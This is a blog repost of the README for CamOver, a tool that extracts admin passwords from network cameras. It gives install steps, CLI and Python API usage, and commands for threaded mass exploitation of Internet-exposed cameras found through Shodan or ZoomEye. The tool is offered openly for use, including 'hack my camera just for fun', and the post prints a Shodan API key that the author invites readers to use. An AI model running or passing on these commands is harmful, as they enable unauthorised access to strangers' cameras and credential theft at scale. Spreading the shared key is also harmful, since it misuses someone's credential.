CamOver : A Camera Exploitation Tool That Allows To Disclosure Network Camera Admin Password

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

Features

  • Exploits vulnerabilities in most popular camera models such as CCTV, GoAhead and Netwave.
  • Optimized to exploit multiple cameras at one time from list with threading enabled.
  • Simple CLI and API usage.

Installation

pip3 install git+https://github.com/EntySec/CamOver

Basic Usage

To use it just type camover in your terminal.

usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [–shodan SHODAN]
[–zoomeye ZOOMEYE] [-p PAGES]
CamOver is a camera exploitation tool that allows to disclosure network camera
admin password.
optional arguments:
-h, –help show this help message and exit
-t, –threads Use threads for fastest work.
-o OUTPUT, –output OUTPUT
Output result to file.
-i INPUT, –input INPUT
Input file of addresses.
-a ADDRESS, –address ADDRESS
Single address.
–shodan SHODAN Shodan API key for exploiting devices over Internet.
–zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, –pages PAGES
Number of pages you want to get from ZoomEye.

Examples

Exploiting single camera

Let’s hack my camera just for fun.

camover -a 192.168.99.100

Exploiting cameras from Internet

Let’s try to use Shodan search engine to exploit cameras over Internet, we will use it with -t for fast exploitation.

camover -t –shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTE: Given Shodan API key (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) is my PRO API key, you can use this key or your own, be free to use all our resources for free 🙂

Exploiting cameras from input file

Let’s try to use opened database of cameras with -t for fast exploitation.

camover -t -i cameras.txt -o passwords.txt

NOTE: It will exploit all cameras in cameras.txt list by their addresses and save all obtained passwords to passwords.txt.

API Usage

CamOver also has their own Python API that can be invoked by importing CamOver to your code.

from camover import CamOver

Basic functions

There are all CamOver basic functions that can be used to exploit specified camera.

exploit(address) – Exploit single camera by given address.

Examples

Exploiting single camera

from camover import CamOver
camover = CamOver()
creds = camover.exploit(‘192.168.99.100’)
print(creds)

Download
R K

Share
Published by
R K
Tags: Camera Admin PasswordCamOverDisclosurenetwork
4 years ago

Recent Posts

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

4 days ago

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

5 days ago

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

5 days ago

How to Undo and Redo in Vim or Vi

Vim and Vi are among the most powerful text editors in the Linux world. They…

5 days ago

How to Unzip and Extract Files in Linux

Working with compressed files is a common task for any Linux user. Whether you are…

5 days ago

Free Email Lookup Tools and Reverse Email Search Resources

In the digital era, an email address can reveal much more than just a contact…

5 days ago